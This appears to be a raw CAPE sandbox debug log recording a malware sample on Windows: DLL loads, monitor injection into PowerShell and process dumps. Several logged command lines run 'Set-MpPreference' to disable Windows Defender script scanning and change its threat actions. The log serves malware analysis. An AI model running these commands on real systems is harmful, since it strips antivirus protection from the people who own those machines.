2019-08-13 23:41:20,581 [root] DEBUG: DLL loaded at 0x000007FEF0BA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-08-13 23:41:20,596 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:20,596 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Windows\System32\cmd.exe" \c powershell Set-MpPreference -DisableScriptScanning $true.
2019-08-13 23:41:20,596 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:20,596 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:20,596 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:20,596 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:20,596 [root] DEBUG: DLL loaded at 0x000007FEF0040000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-08-13 23:41:20,611 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:20,611 [root] INFO: Added new process to list with pid: 3488
2019-08-13 23:41:20,611 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:20,628 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:20,628 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:20,628 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-08-13 23:41:20,628 [root] INFO: Monitor successfully loaded in process with pid 3488.
2019-08-13 23:41:20,628 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:20,644 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEEFD10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEEE420000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEEE420000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEEFCA0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-08-13 23:41:20,674 [root] INFO: Announced 64-bit process name: powershell.exe pid: 3112
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000000001D120000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:20,674 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:20,690 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3640 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x0000000000295000-0x00000000002A0000
2019-08-13 23:41:20,690 [root] DEBUG: DLL loaded at 0x000000001CFF0000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:20,690 [root] DEBUG: DLL loaded at 0x000007FEF9860000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-08-13 23:41:20,690 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-08-13 23:41:20,690 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:20,690 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:20,690 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -ModerateThreatDefaultAction 6.
2019-08-13 23:41:20,706 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:20,706 [lib.api.process] INFO: 64-bit DLL to inject is C:\jyguetdlo\dll\SqhZht.dll, loader C:\jyguetdlo\bin\dnzkprjc.exe
2019-08-13 23:41:20,721 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:20,721 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:20,736 [root] INFO: Added new process to list with pid: 3640
2019-08-13 23:41:20,736 [root] INFO: Monitor successfully loaded in process with pid 3640.
2019-08-13 23:41:20,736 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:20,736 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:20,736 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:20,736 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:20,736 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:20,736 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mhKdbgZcE.
2019-08-13 23:41:20,736 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:20,753 [root] DEBUG: Loader: Injecting process 3112 (thread 3144) with C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,753 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:20,753 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:20,753 [root] DEBUG: Process image base: 0x000000013F390000
2019-08-13 23:41:20,753 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:20,753 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:20,767 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,767 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:20,767 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:20,767 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:20,767 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:20,815 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:20,815 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013F407000 - 0x000007FEFF430000
2019-08-13 23:41:20,815 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:20,815 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:20,831 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:20,831 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013F410000.
2019-08-13 23:41:20,831 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:20,831 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:20,831 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-08-13 23:41:20,845 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:20,845 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:20,924 [root] DEBUG: Successfully injected DLL C:\jyguetdlo\dll\SqhZht.dll.
2019-08-13 23:41:20,924 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 3112
2019-08-13 23:41:20,940 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:20,940 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:20,940 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:20,956 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-08-13 23:41:20,956 [root] DEBUG: DLL loaded at 0x000007FEEFBF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-08-13 23:41:20,956 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:20,986 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:20,986 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:20,986 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:20,986 [root] DEBUG: Process dumps enabled.
2019-08-13 23:41:20,986 [root] DEBUG: DLL loaded at 0x000007FEEFB00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-08-13 23:41:21,017 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:21,017 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:21,033 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-08-13 23:41:21,079 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:21,079 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:21,079 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:21,079 [root] INFO: Disabling sleep skipping.
2019-08-13 23:41:21,095 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:21,095 [root] DEBUG: DLL loaded at 0x000007FEEF8E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-08-13 23:41:21,095 [root] DEBUG: DLL loaded at 0x0000000516F00000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\diasymreader (0xc6000 bytes).
2019-08-13 23:41:21,142 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-08-13 23:41:21,157 [root] WARNING: Unable to place hook on LockResource
2019-08-13 23:41:21,190 [root] DEBUG: DLL loaded at 0x000007FEEF7C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-08-13 23:41:21,190 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00260000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:21,190 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-08-13 23:41:21,190 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-08-13 23:41:21,190 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-08-13 23:41:21,190 [root] WARNING: Unable to hook LockResource
2019-08-13 23:41:21,204 [root] DEBUG: DLL loaded at 0x000007FEF3870000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-08-13 23:41:21,220 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-08-13 23:41:21,220 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:21,236 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-08-13 23:41:21,252 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-08-13 23:41:21,252 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:21,252 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 3112 at 0x0000000074460000, image base 0x000000013F390000, stack from 0x0000000000285000-0x0000000000290000
2019-08-13 23:41:21,267 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-08-13 23:41:21,282 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\DY63D6T0HFBA1VQSZOV0.temp'
2019-08-13 23:41:21,282 [root] DEBUG: DLL loaded at 0x000007FEEE420000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-08-13 23:41:21,282 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:21,282 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\powershell  Set-MpPreference -DisableScriptScanning $true.
2019-08-13 23:41:21,282 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\DY63D6T0HFBA1VQSZOV0.temp'
2019-08-13 23:41:21,299 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-08-13 23:41:21,299 [root] DEBUG: DLL loaded at 0x000000001D0C0000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-08-13 23:41:21,299 [root] INFO: Added new process to list with pid: 3112
2019-08-13 23:41:21,299 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-08-13 23:41:21,299 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-08-13 23:41:21,313 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-08-13 23:41:21,313 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-08-13 23:41:21,313 [root] INFO: Monitor successfully loaded in process with pid 3112.
2019-08-13 23:41:21,313 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:21,313 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\DY63D6T0HFBA1VQSZOV0.temp'
2019-08-13 23:41:21,329 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2952
2019-08-13 23:41:21,329 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 624
2019-08-13 23:41:21,329 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-08-13 23:41:21,329 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-08-13 23:41:21,345 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-08-13 23:41:21,345 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:21,345 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP'
2019-08-13 23:41:21,361 [root] DEBUG: GetHookCallerBase: thread 2932 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:21,361 [root] DEBUG: GetHookCallerBase: thread 880 (handle 0x0), return address 0x000000013F39C504, allocation base 0x000000013F390000.
2019-08-13 23:41:21,361 [root] DEBUG: DLL loaded at 0x000007FEEF630000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-08-13 23:41:21,361 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-08-13 23:41:21,361 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-08-13 23:41:21,361 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms'
2019-08-13 23:41:21,377 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:21,377 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-08-13 23:41:21,377 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x000000013F390000.
2019-08-13 23:41:21,377 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-08-13 23:41:21,377 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp" does not exist, skip.
2019-08-13 23:41:21,377 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:21,377 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000000013F390000.
2019-08-13 23:41:21,377 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-08-13 23:41:21,391 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:21,391 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000C63C.
2019-08-13 23:41:21,391 [root] DEBUG: DLL loaded at 0x000007FEF2F10000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-08-13 23:41:21,391 [root] WARNING: File at path "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp" does not exist, skip.
2019-08-13 23:41:21,391 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-08-13 23:41:21,391 [root] DEBUG: DLL loaded at 0x000007FEF2570000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-08-13 23:41:21,407 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-08-13 23:41:21,407 [root] DEBUG: DLL loaded at 0x0000000074090000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-08-13 23:41:21,424 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-08-13 23:41:21,438 [root] DEBUG: DLL loaded at 0x000007FEF1690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-08-13 23:41:21,438 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-08-13 23:41:21,454 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-08-13 23:41:21,454 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-08-13 23:41:21,454 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-08-13 23:41:21,470 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\624_19985978803116214382019
2019-08-13 23:41:21,470 [root] INFO: Added new CAPE file to list with path: C:\bbTJiLOfj\CAPE\2952_285436256411214382019
2019-08-13 23:41:21,470 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-08-13 23:41:21,470 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:21,470 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x73e00.
2019-08-13 23:41:21,470 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-08-13 23:41:21,470 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:21,470 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-08-13 23:41:21,486 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x000007FEFB840000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x000007FEF2570000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x000007FEF2F10000.
2019-08-13 23:41:21,502 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:21,516 [root] DEBUG: DLL unloaded from 0x000007FEFC190000.
2019-08-13 23:41:21,516 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:21,516 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2019-08-13 23:41:21,516 [root] INFO: Notified of termination of process with pid 2952.
2019-08-13 23:41:21,516 [root] INFO: Notified of termination of process with pid 624.
2019-08-13 23:41:21,532 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2132
2019-08-13 23:41:21,532 [root] DEBUG: DLL loaded at 0x000007FEEEF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-08-13 23:41:21,532 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2208
2019-08-13 23:41:21,532 [root] DEBUG: GetHookCallerBase: thread 2156 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:21,548 [root] DEBUG: DLL loaded at 0x000007FEEEE10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-08-13 23:41:21,548 [root] DEBUG: GetHookCallerBase: thread 2212 (handle 0x0), return address 0x0000000049D987DD, allocation base 0x0000000049D90000.
2019-08-13 23:41:21,548 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:21,548 [root] DEBUG: DLL loaded at 0x000007FEEEC70000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-08-13 23:41:21,563 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x0000000049D90000.
2019-08-13 23:41:21,563 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:21,563 [root] DEBUG: DLL loaded at 0x000007FEF9850000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-08-13 23:41:21,563 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000049D90000.
2019-08-13 23:41:21,688 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
2019-08-13 23:41:21,720 [root] DEBUG: DumpProcess: Module entry point VA is 0x00000000000090B4.
